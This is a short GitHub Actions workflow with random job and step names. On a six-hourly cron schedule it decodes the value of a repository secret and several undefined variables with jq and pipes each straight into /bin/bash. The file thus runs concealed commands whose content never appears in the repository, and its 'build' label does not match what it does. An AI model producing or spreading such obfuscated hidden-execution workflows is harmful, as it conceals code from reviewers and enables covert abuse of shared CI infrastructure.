name: uooinhak

on:
  workflow_dispatch:
  schedule:
    - cron: '44 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: uooinhak
        env:
          a0: ${{ secrets.a0 }}
        run: |
          echo $a0 | jq -r .r546 | /bin/bash
          echo $v17938 | jq -r .ve58115 | /bin/bash
          echo $gegpk51 | jq -r .pcvl177 | /bin/bash
          echo $kg0 | jq -r .ywlfa20 | /bin/bash
          echo $wotep5458 | jq -r .x6 | /bin/bash
          echo $br3 | jq -r .a65261 | /bin/bash
          echo $bro07240 | jq -r .bmxwf652 | /bin/bash
          echo $aka35106 | jq -r .kwe338 | /bin/bash

